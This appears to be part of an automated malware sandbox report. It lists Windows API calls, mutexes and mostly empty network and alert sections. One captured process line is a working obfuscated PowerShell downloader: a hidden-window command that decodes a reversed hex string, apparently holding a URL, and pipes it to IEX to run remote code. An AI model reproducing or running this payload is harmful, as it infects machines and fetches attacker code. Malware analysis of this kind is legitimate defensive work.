                mshtml.dll.TravelLogCreateInstance

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance

                
                oleaut32.dll.#10

                
                oleaut32.dll.#7

                
                urlmon.dll.#485

                
                shell32.dll.SHCreateAssociationRegistration

                
                urlmon.dll.CoInternetGetSession

                
                urlmon.dll.#471

                
                urlmon.dll.#486

                
                urlmon.dll.#553

                
                kernel32.dll.InitializeSRWLock

                
                kernel32.dll.AcquireSRWLockShared

                
                kernel32.dll.ReleaseSRWLockShared

                
                oleaut32.dll.#2

                
                urlmon.dll.ReleaseBindInfo

                
                urlmon.dll.#446

                
                oleaut32.dll.#8

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoWaitForMultipleHandles

                
                urlmon.dll.RevokeBindStatusCallback

                
                sechost.dll.LookupAccountNameLocalW

                
                urlmon.dll.CoInternetCreateZoneManager

                
                advapi32.dll.LookupAccountSidW

                
                sechost.dll.LookupAccountSidLocalW

                
                ole32.dll.NdrOleInitializeExtension

                
                ole32.dll.CoGetClassObject

                
                ole32.dll.CoGetMarshalSizeMax

                
                ole32.dll.CoMarshalInterface

                
                ole32.dll.CoUnmarshalInterface

                
                ole32.dll.StringFromIID

                
                ole32.dll.CoGetPSClsid

                
                ole32.dll.CoReleaseMarshalData

                
                ole32.dll.DcomChannelSetHResult

                
                urlmon.dll.#101

                
                rpcrtremote.dll.I_RpcExtInitializeExtensionPoint

                
                urlmon.dll.#513

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.GetTokenInformation

                
                secur32.dll.GetUserNameExA

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthorityCount

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthority

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExA

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExA

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExW

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueW

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCloseKey

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegSetValueExW

                
                shell32.dll.SHGetKnownFolderPath

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.CopySid

                
                comctl32.dll.#326

                
                urlmon.dll.ShouldShowIntranetWarningSecband

                
                ieframe.dll.#159

                
                mlang.dll.#112

                
                propsys.dll.PSCreateMemoryPropertyStore

                
                wininet.dll.GetUrlCacheEntryBinaryBlob

                
                urlmon.dll.CompatFlagsFromClsid

                
                oleaut32.dll.#27

                
                shlwapi.dll.#29

                
                oleaut32.dll.#15

                
                oleaut32.dll.#26

                
                advapi32.dll.InitializeSecurityDescriptor

                
                advapi32.dll.SetEntriesInAclW

                
                advapi32.dll.SetSecurityDescriptorDacl

                
                advapi32.dll.IsTextUnicode

                
                comctl32.dll.#328

                
                comctl32.dll.#334

                
                comctl32.dll.#332

                
                comctl32.dll.#338

                
                setupapi.dll.CM_Get_Device_Interface_List_Size_ExW

                
                setupapi.dll.CM_Get_Device_Interface_List_ExW

                
                comctl32.dll.#386

                
                oleaut32.dll.#16

                
                ole32.dll.RegisterDragDrop

                
                msls31.dll.#62

                
                msls31.dll.#63

                
                msls31.dll.#66

                
                msls31.dll.#61

                
                msls31.dll.#71

                
                msls31.dll.#1

                
                msls31.dll.#49

                
                msls31.dll.#52

                
                msls31.dll.#48

                
                msls31.dll.#3

                
                d2d1.dll.#1

                
                dwrite.dll.DWriteCreateFactory

                
                dxgi.dll.CreateDXGIFactory1

                
                gdi32.dll.D3DKMTOpenAdapterFromGdiDisplayName

                
                gdi32.dll.D3DKMTCloseAdapter

                
                gdi32.dll.D3DKMTQueryAdapterInfo

                
                gdi32.dll.D3DKMTOpenAdapterFromDeviceName

                
                setupapi.dll.SetupDiGetClassDevsW

                
                setupapi.dll.SetupDiEnumDeviceInterfaces

                
                setupapi.dll.SetupDiGetDeviceInterfaceDetailW

                
                setupapi.dll.SetupDiDestroyDeviceInfoList

                
                setupapi.dll.SetupDiGetDevicePropertyW

                
                wintrust.dll.WinVerifyTrust

                
                d3d11.dll.D3D11CreateDevice

                
                dxgi.dll.CompatValue

                
                d3d10warp.dll.D3DKMTOpenAdapterFromGdiDisplayName

                
                d3d10warp.dll.D3DKMTOpenAdapterFromDeviceName

                
                d3d10warp.dll.D3DKMTGetDisplayModeList

                
                d3d10warp.dll.D3DKMTSetVidPnSourceOwner

                
                d3d10warp.dll.D3DKMTSetDisplayMode

                
                d3d10warp.dll.D3DKMTCloseAdapter

                
                d3d10warp.dll.D3DKMTSetGammaRamp

                
                d3d10warp.dll.D3DKMTGetDeviceState

                
                d3d10warp.dll.D3DKMTQueryAdapterInfo

                
                d3d10warp.dll.D3DKMTWaitForVerticalBlankEvent

                
                gdi32.dll.D3DKMTCreateDCFromMemory

                
                gdi32.dll.D3DKMTDestroyDCFromMemory

                
                gdi32.dll.D3DKMTCheckVidPnExclusiveOwnership

                
                gdi32.dll.D3DKMTCheckMonitorPowerState

                
                gdi32.dll.D3DKMTCheckSharedResourceAccess

                
                d3d10warp.dll.D3DKMTGetMultisampleMethodList

                
                d3d10warp.dll.D3DKMTSetDisplayPrivateDriverFormat

                
                d3d10warp.dll.D3DKMTDestroySynchronizationObject

                
                d3d10warp.dll.D3DKMTCreateSynchronizationObject

                
                d3d10warp.dll.D3DKMTDestroyContext

                
                d3d10warp.dll.D3DKMTCreateContext

                
                d3d10warp.dll.D3DKMTGetContextSchedulingPriority

                
                d3d10warp.dll.D3DKMTSetContextSchedulingPriority

                
                d3d10warp.dll.D3DKMTPresent

                
                d3d10warp.dll.D3DKMTDestroyDevice

                
                d3d10warp.dll.D3DKMTCreateDevice

                
                d3d10warp.dll.D3DKMTQueryAllocationResidency

                
                d3d10warp.dll.D3DKMTSetAllocationPriority

                
                d3d10warp.dll.D3DKMTDestroyAllocation

                
                d3d10warp.dll.D3DKMTOpenResource

                
                d3d10warp.dll.D3DKMTQueryResourceInfo

                
                d3d10warp.dll.D3DKMTCreateAllocation

                
                d3d10warp.dll.D3DKMTSignalSynchronizationObject

                
                d3d10warp.dll.D3DKMTWaitForSynchronizationObject

                
                d3d10warp.dll.D3DKMTEscape

                
                d3d10warp.dll.D3DKMTUnlock

                
                d3d10warp.dll.D3DKMTLock

                
                d3d10warp.dll.D3DKMTRender

                
                d3d10warp.dll.OpenAdapter10_2

                
                d3d10warp.dll.#199

                
                urlmon.dll.#421

                
                urlmon.dll.#408

                
                msls31.dll.#44

                
                msls31.dll.#5

                
                ole32.dll.OleRun

                
                msls31.dll.#20

                
                propsys.dll.VariantToStringWithDefault

                
                oleaut32.dll.#411

                
                oleaut32.dll.#23

                
                oleaut32.dll.#24

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.PropVariantClear

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHCreateMemStream

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.IStream_Reset

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.IStream_Size

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.IStream_Read

                
                wininet.dll.CommitUrlCacheEntryBinaryBlob

                
                wininet.dll.GetUrlCacheEntryInfoExW

                
                urlmon.dll.#404

                
                uxtheme.dll.#61

                
                uxtheme.dll.GetThemeEnumValue

                
                uxtheme.dll.GetThemeBitmap

                
                uxtheme.dll.GetThemeInt

                
                uxtheme.dll.GetThemeMargins

                
                uxtheme.dll.GetThemePosition

                
                msls31.dll.#40

                
                user32.dll.IsWindowRedirectedForPrint

                
                msls31.dll.#43

                
                ole32.dll.CreateBindCtx

                
                comctl32.dll.#339

                
                comctl32.dll.#385

                
                comctl32.dll.#336

                
                comctl32.dll.#321

                
                comctl32.dll.#329

                
                comctl32.dll.#333

                
                ntdll.dll.RtlDllShutdownInProgress

                
                linkinfo.dll.IsValidLinkInfo

                
                propsys.dll.#417

                
                propsys.dll.PSGetNameFromPropertyKey

                
                propsys.dll.PSStringFromPropertyKey

                
                propsys.dll.InitVariantFromBuffer

                
                propsys.dll.PropVariantToGUID

                
                ole32.dll.PropVariantClear

                
                sechost.dll.ConvertSidToStringSidW

                
                profapi.dll.#104

                
                linkinfo.dll.CreateLinkInfoW

                
                user32.dll.IsCharAlphaW

                
                user32.dll.CharPrevW

                
                ntshrui.dll.GetNetResourceFromLocalPathW

                
                srvcli.dll.NetShareEnum

                
                cscapi.dll.CscNetApiGetInterface

                
                slc.dll.SLGetWindowsInformationDWORD

                
                shlwapi.dll.PathRemoveFileSpecW

                
                linkinfo.dll.DestroyLinkInfo

                
                propsys.dll.PropVariantToBoolean

                
                cryptsp.dll.CryptReleaseContext

                
                advapi32.dll.GetSecurityInfo

                
                advapi32.dll.SetSecurityInfo

                
                advapi32.dll.GetSecurityDescriptorControl

                
                comctl32.dll.#388

                
                oleaut32.dll.#500

                
                mscoreei.dll.RegisterShimImplCallback

                
                mscoreei.dll.OnShimDllMainCalled

                
                mscoreei.dll.CorBindToRuntimeEx

                
                shlwapi.dll.UrlIsW

                
                version.dll.GetFileVersionInfoSizeW

                
                version.dll.GetFileVersionInfoW

                
                version.dll.VerQueryValueW

                
                clr.dll.SetRuntimeInfo

                
                user32.dll.GetProcessWindowStation

                
                user32.dll.GetUserObjectInformationW

                
                clr.dll.DllGetClassObjectInternal

                
                kernel32.dll.AddDllDirectory

                
                mscoree.dll.CreateConfigStream

                
                mscoreei.dll.CreateConfigStream

                
                kernel32.dll.GetNumaHighestNodeNumber

                
                kernel32.dll.FlsSetValue

                
                kernel32.dll.FlsGetValue

                
                kernel32.dll.FlsAlloc

                
                kernel32.dll.FlsFree

                
                ntdll.dll.RtlVirtualUnwind

                
                kernel32.dll.GetSystemWindowsDirectoryW

                
                advapi32.dll.AllocateAndInitializeSid

                
                advapi32.dll.OpenProcessToken

                
                advapi32.dll.GetTokenInformation

                
                advapi32.dll.InitializeAcl

                
                advapi32.dll.AddAccessAllowedAce

                
                advapi32.dll.FreeSid

                
                kernel32.dll.AddSIDToBoundaryDescriptor

                
                kernel32.dll.CreateBoundaryDescriptorW

                
                kernel32.dll.CreatePrivateNamespaceW

                
                kernel32.dll.OpenPrivateNamespaceW

                
                kernel32.dll.DeleteBoundaryDescriptor

                
                kernel32.dll.WerRegisterRuntimeExceptionModule

                
                kernel32.dll.RaiseException

                
                mscoree.dll.#24

                
                mscoreei.dll.#24

                
                mscoree.dll.GetProcessExecutableHeap

                
                mscoreei.dll.GetProcessExecutableHeap

                
                ole32.dll.CoGetContextToken

                
                ntdll.dll.NtSetSystemInformation

                
                oleaut32.dll.SysStringByteLen

                
                kernel32.dll.GetLocaleInfoEx

                
                kernel32.dll.LocaleNameToLCID

                
                cryptsp.dll.CryptHashData

                
                cryptsp.dll.CryptGetHashParam

                
                cryptsp.dll.CryptDestroyHash

                
                cryptsp.dll.CryptDestroyKey

                
                oleaut32.dll.#149

                
                advapi32.dll.EventRegister

                
                advapi32.dll.EventSetInformation

                
                ntdll.dll.NtQueryInformationThread

                
                ntdll.dll.NtQuerySystemInformation

                
                kernel32.dll.CreateWaitableTimerExW

                
                kernel32.dll.SetWaitableTimerEx

                
                advapi32.dll.EventActivityIdControl

                
                advapi32.dll.EventWriteTransfer

                
                kernel32.dll.LocalFree

                
                kernel32.dll.LocalAlloc

                
                kernel32.dll.GetFullPathNameW

                
                kernel32.dll.SetThreadErrorMode

                
                kernel32.dll.GetFileAttributesExW

                
                kernel32.dll.GetUserDefaultLocaleName

                
                kernel32.dll.LCIDToLocaleName

                
                kernel32.dll.GetUserPreferredUILanguages

                
                nlssorting.dll.SortGetHandle

                
                nlssorting.dll.SortCloseHandle

                
                kernel32.dll.ResolveLocaleName

                
                kernel32.dll.CompareStringOrdinal

                
                kernel32.dll.LCMapStringEx

                
                version.dll.VerLanguageNameW

                
                kernel32.dll.GetCurrentProcessId

                
                advapi32.dll.LookupPrivilegeValueW

                
                kernel32.dll.GetCurrentProcess

                
                advapi32.dll.AdjustTokenPrivileges

                
                kernel32.dll.CloseHandle

                
                kernel32.dll.OpenProcess

                
                psapi.dll.EnumProcessModules

                
                psapi.dll.GetModuleInformation

                
                psapi.dll.GetModuleBaseNameW

                
                psapi.dll.GetModuleFileNameExW

                
                kernel32.dll.CreateFileW

                
                kernel32.dll.GetFileType

                
                wintrust.dll.WintrustCertificateTrust

                
                wintrust.dll.SoftpubAuthenticode

                
                wintrust.dll.SoftpubInitialize

                
                wintrust.dll.SoftpubLoadMessage

                
                wintrust.dll.SoftpubLoadSignature

                
                wintrust.dll.SoftpubCheckCert

                
                wintrust.dll.SoftpubCleanup

                
                cryptsp.dll.CryptAcquireContextA

                
                msisip.dll.MsiSIPIsMyTypeOfFile

                
                ole32.dll.CoInitialize

                
                ole32.dll.StgOpenStorage

                
                kernel32.dll.GetExitCodeProcess

                
                user32.dll.EnumWindows

                
                user32.dll.GetWindowThreadProcessId

                
                user32.dll.GetWindow

                
                user32.dll.IsWindowVisible

                
                kernel32.dll.WerSetFlags

                
                kernel32.dll.SetThreadPreferredUILanguages

                
                wshext.dll.DllCanUnloadNow

                
                wshext.dll.IsFileSupportedName

                
                pwrshsip.dll.PsIsMyFileType

                
                pwrshsip.dll.PsPutSignature

                
                pwrshsip.dll.PsGetSignature

                
                kernel32.dll.GetEnvironmentVariableW

                
                wintrust.dll.WTHelperProvDataFromStateData

                
                wintrust.dll.WTHelperGetProvSignerFromChain

                
                ole32.dll.CoCreateGuid

                
                kernel32.dll.GetConsoleCP

                
                kernel32.dll.GetCurrentConsoleFontEx

                
                kernel32.dll.GetTimeZoneInformation

                
                advapi32.dll.ConvertSidToStringSidW

                
                bcrypt.dll.BCryptGetFipsAlgorithmMode

                
                cryptsp.dll.CryptGetDefaultProviderW

                
                kernel32.dll.GetComputerNameW

                
                kernel32.dll.GetConsoleScreenBufferInfo

                
                kernel32.dll.GetConsoleMode

                
                kernel32.dll.SetConsoleMode

                
                kernel32.dll.SetConsoleCtrlHandler

                
                kernel32.dll.GetStdHandle

                
                advapi32.dll.DuplicateTokenEx

                
                kernel32.dll.GetConsoleTitleW

                
                kernel32.dll.GetConsoleWindow

                
                user32.dll.ShowWindow

                
                kernel32.dll.GetProcessTimes

                
                kernel32.dll.GetDynamicTimeZoneInformation

                
                kernel32.dll.GetFileMUIPath

                
                kernel32.dll.LoadLibraryExW

                
                kernel32.dll.FreeLibrary

                
                user32.dll.LoadStringW

                
                kernel32.dll.CreateNamedPipeW

                
                kernel32.dll.SetEnvironmentVariableW

                
                kernel32.dll.CreateEventW

                
                kernel32.dll.ConnectNamedPipe

                
                mscoree.dll.GetTokenForVTableEntry

                
                mscoree.dll.SetTargetForVTableEntry

                
                mscoree.dll.GetTargetForVTableEntry

                
                mscoreei.dll.GetTokenForVTableEntry

                
                mscoreei.dll.SetTargetForVTableEntry

                
                api-ms-win-core-xstate-l2-1-0.dll.GetEnabledXStateFeatures

                
                clrjit.dll.sxsJitStartup

                
                clrjit.dll.jitStartup

                
                clrjit.dll.getJit

                
                kernel32.dll.ExpandEnvironmentStringsW

                
                advapi32.dll.GetUserNameW

                
                kernel32.dll.EnumCalendarInfoExEx

                
                kernel32.dll.GetCalendarInfoEx

                
                kernel32.dll.EnumSystemLocalesEx

                
                kernel32.dll.EnumTimeFormatsEx

                
                kernel32.dll.ReleaseMutex

                
                advapi32.dll.RegisterEventSourceW

                
                advapi32.dll.DeregisterEventSource

                
                advapi32.dll.ReportEventW

                
                kernel32.dll.GetLogicalDrives

                
                kernel32.dll.GetDriveTypeW

                
                kernel32.dll.GetVolumeInformationW

                
                shlwapi.dll.PathIsNetworkPathW

                
                kernel32.dll.GetFileAttributesW

                
                kernel32.dll.GetCurrentDirectoryW

                
                kernel32.dll.GetSystemDirectoryW

                
                kernel32.dll.GetTempPathW

                
                kernel32.dll.WriteFile

                
                advapi32.dll.SaferIdentifyLevel

                
                advapi32.dll.SaferComputeTokenFromLevel

                
                advapi32.dll.SaferCloseLevel

                
                kernel32.dll.DeleteFileW

                
                kernel32.dll.GetSystemInfo

                
                kernel32.dll.QueryPerformanceFrequency

                
                kernel32.dll.QueryPerformanceCounter

                
                kernel32.dll.SetEvent

                
                ole32.dll.CoWaitForMultipleHandles

                
                kernel32.dll.SetThreadUILanguage

                
                kernel32.dll.CreateDirectoryW

                
                kernel32.dll.SetFilePointer

                
                kernel32.dll.GetLastError

                
                kernel32.dll.FindFirstFileW

                
                kernel32.dll.FindClose

                
                kernel32.dll.FindNextFileW

                
                kernel32.dll.ReadFile

                
                kernel32.dll.GetACP

                
                kernel32.dll.UnmapViewOfFile

                
                ole32.dll.IIDFromString

                
                ole32.dll.CoCreateFreeThreadedMarshaler

                
                ole32.dll.CoGetObjectContext

                
                kernel32.dll.LoadLibraryA

                
                kernel32.dll.WideCharToMultiByte

                
                kernel32.dll.GetProcAddress

                
                wminet_utils.dll.ResetSecurity

                
                wminet_utils.dll.SetSecurity

                
                wminet_utils.dll.BlessIWbemServices

                
                wminet_utils.dll.BlessIWbemServicesObject

                
                wminet_utils.dll.GetPropertyHandle

                
                wminet_utils.dll.WritePropertyValue

                
                wminet_utils.dll.Clone

                
                wminet_utils.dll.VerifyClientKey

                
                wminet_utils.dll.GetQualifierSet

                
                wminet_utils.dll.Get

                
                wminet_utils.dll.Put

                
                wminet_utils.dll.Delete

                
                wminet_utils.dll.GetNames

                
                wminet_utils.dll.BeginEnumeration

                
                wminet_utils.dll.Next

                
                wminet_utils.dll.EndEnumeration

                
                wminet_utils.dll.GetPropertyQualifierSet

                
                wminet_utils.dll.GetObjectText

                
                wminet_utils.dll.SpawnDerivedClass

                
                wminet_utils.dll.SpawnInstance

                
                wminet_utils.dll.CompareTo

                
                wminet_utils.dll.GetPropertyOrigin

                
                wminet_utils.dll.InheritsFrom

                
                wminet_utils.dll.GetMethod

                
                wminet_utils.dll.PutMethod

                
                wminet_utils.dll.DeleteMethod

                
                wminet_utils.dll.BeginMethodEnumeration

                
                wminet_utils.dll.NextMethod

                
                wminet_utils.dll.EndMethodEnumeration

                
                wminet_utils.dll.GetMethodQualifierSet

                
                wminet_utils.dll.GetMethodOrigin

                
                wminet_utils.dll.QualifierSet_Get

                
                wminet_utils.dll.QualifierSet_Put

                
                wminet_utils.dll.QualifierSet_Delete

                
                wminet_utils.dll.QualifierSet_GetNames

                
                wminet_utils.dll.QualifierSet_BeginEnumeration

                
                wminet_utils.dll.QualifierSet_Next

                
                wminet_utils.dll.QualifierSet_EndEnumeration

                
                wminet_utils.dll.GetCurrentApartmentType

                
                wminet_utils.dll.GetDemultiplexedStub

                
                wminet_utils.dll.CreateInstanceEnumWmi

                
                wminet_utils.dll.CreateClassEnumWmi

                
                wminet_utils.dll.ExecQueryWmi

                
                wminet_utils.dll.ExecNotificationQueryWmi

                
                wminet_utils.dll.PutInstanceWmi

                
                wminet_utils.dll.PutClassWmi

                
                wminet_utils.dll.CloneEnumWbemClassObject

                
                wminet_utils.dll.ConnectServerWmi

                
                wminet_utils.dll.GetErrorInfo

                
                wminet_utils.dll.Initialize

                
                kernel32.dll.GetSystemDefaultLocaleName

                
                fastprox.dll.DllGetClassObject

                
                fastprox.dll.DllCanUnloadNow

                
                oleaut32.dll.SysStringLen

                
                kernel32.dll.RtlZeroMemory

                
                oleaut32.dll.#200

                
                userenv.dll.CreateEnvironmentBlock

                
                sspicli.dll.GetUserNameExW

                
                userenv.dll.DestroyEnvironmentBlock

                
                vssapi.dll.CreateWriter

                
                advapi32.dll.LookupAccountNameW

                
                samcli.dll.NetLocalGroupGetMembers

                
                samlib.dll.SamConnect

                
                rpcrt4.dll.NdrClientCall3

                
                rpcrt4.dll.RpcStringBindingComposeW

                
                rpcrt4.dll.RpcBindingFromStringBindingW

                
                rpcrt4.dll.RpcStringFreeW

                
                rpcrt4.dll.RpcBindingFree

                
                samlib.dll.SamOpenDomain

                
                samlib.dll.SamLookupNamesInDomain

                
                samlib.dll.SamOpenAlias

                
                samlib.dll.SamFreeMemory

                
                samlib.dll.SamCloseHandle

                
                samlib.dll.SamGetMembersInAlias

                
                netutils.dll.NetApiBufferFree

                
                samlib.dll.SamEnumerateDomainsInSamServer

                
                samlib.dll.SamLookupDomainInSamServer

                
                ole32.dll.StringFromCLSID

                
                propsys.dll.VariantToPropVariant

                
                wbemcore.dll.Reinitialize

                
                wbemsvc.dll.DllGetClassObject

                
                wbemsvc.dll.DllCanUnloadNow

                
                authz.dll.AuthzInitializeContextFromToken

                
                authz.dll.AuthzInitializeObjectAccessAuditEvent2

                
                authz.dll.AuthzAccessCheck

                
                authz.dll.AuthzFreeAuditEvent

                
                authz.dll.AuthzFreeContext

                
                authz.dll.AuthzInitializeResourceManager

                
                authz.dll.AuthzFreeResourceManager

                
                rpcrt4.dll.RpcBindingCreateW

                
                rpcrt4.dll.RpcBindingBind

                
                rpcrt4.dll.I_RpcMapWin32Status

                
                advapi32.dll.EventUnregister

                
                advapi32.dll.EventWrite

                
                advapi32.dll.EventEnabled

                
                kernel32.dll.RegCloseKey

                
                kernel32.dll.RegSetValueExW

                
                kernel32.dll.RegOpenKeyExW

                
                kernel32.dll.RegQueryValueExW

                
                wmisvc.dll.IsImproperShutdownDetected

                
                wevtapi.dll.EvtRender

                
                wevtapi.dll.EvtNext

                
                wevtapi.dll.EvtClose

                
                wevtapi.dll.EvtQuery

                
                wevtapi.dll.EvtCreateRenderContext

                
                rpcrt4.dll.RpcBindingSetAuthInfoExW

                
                rpcrt4.dll.RpcBindingSetOption

                
                ole32.dll.CreateStreamOnHGlobal

                
                kernelbase.dll.InitializeAcl

                
                kernelbase.dll.AddAce

                
                kernel32.dll.OpenProcessToken

                
                kernelbase.dll.GetTokenInformation

                
                kernelbase.dll.DuplicateTokenEx

                
                kernelbase.dll.AdjustTokenPrivileges

                
                kernelbase.dll.AllocateAndInitializeSid

                
                kernelbase.dll.CheckTokenMembership

                
                kernel32.dll.SetThreadToken

                
                ole32.dll.CLSIDFromString

                
                ole32.dll.CoRevertToSelf

                
                sspicli.dll.LogonUserExExW

                
                authz.dll.AuthzInitializeContextFromSid

                
                ole32.dll.CoGetCallContext

                
                ole32.dll.StringFromGUID2

                
                ole32.dll.CoImpersonateClient

                
                ole32.dll.CoSwitchCallContext

                
                ole32.dll.CLSIDFromOle1Class

                
                clbcatq.dll.GetCatalogObject

                
                clbcatq.dll.GetCatalogObject2

                
                wininet.dll.DllGetClassObject

                
                wininet.dll.DllCanUnloadNow

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoImpersonateClient

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoRevertToSelf

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.EqualSid

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.EventRegister

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.EventUnregister

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueA

                
                iertutil.dll.#701

                
                iertutil.dll.#703

                
                iertutil.dll.#702

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExA

                
                ws2_32.dll.#115

                
                ws2_32.dll.#111

                
                iertutil.dll.#791

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExW

                
                api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExW

                
                ws2_32.dll.#23

                
                ws2_32.dll.#21

                
                ws2_32.dll.WSAIoctl

                
                ws2_32.dll.#3

                
                ws2_32.dll.#116

                
                iphlpapi.dll.NotifyIpInterfaceChange

                
                iphlpapi.dll.NotifyUnicastIpAddressChange

                
                iphlpapi.dll.GetBestInterfaceEx

                
                iphlpapi.dll.GetIfEntry2

                
                
            

        

        

            

                
                
                "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden $biLMH='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@32@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@05@73@F2@F6@27@E2@47@27@56@36@37@57@C6@07@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$biLMH.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))

                
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

                
                C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

                
                
            

        

        

            

                
                
                CicLoadWinStaWinSta0

                
                Local\MSCTF.CtfMonitorInstMutexDefault1

                
                Local\ZonesCacheCounterMutex

                
                Local\ZonesLockedCacheCounterMutex

                
                !IECompat!Mutex

                
                
            

        

        

            

                
            

        

        

            

                
            

        

        

            

                
                
No results

                
            

        

    






    

    

        
    
Sorry! No behavior.



    

    

        

    
    
Sorry! No tracee.

    


    

    

        
    
Sorry! No strace.



    

    

        

    
    
Sorry! No tracee.

    


    

    

        
    
    

        

    
        
No hosts contacted.

    




        



    
        
No TCP connections recorded.

    





        



    
        
No UDP connections recorded.

    




        

    
        
No domains contacted.

    




        
HTTP Requests


    
No HTTP(s) requests performed.




        
SMTP traffic



No SMTP traffic performed.




        
IRC traffic



No IRC requests performed.




        


No ICMP traffic performed.




        

    
CIF Results

    
        
No CIF Results

    




        

    
Suricata Alerts

    
        
No Suricata Alerts

    




        

    
Suricata TLS

    
        
No Suricata TLS

    




        

    
Suricata HTTP

    
        
No Suricata HTTP

    




        

    
Sorry! No Suricata Extracted files.




    


    

    

         



    
Sorry! No dropped files.



    

    
        

         



    
Sorry! No CAPE files.



        

    
    

         


    
Sorry! No process dumps.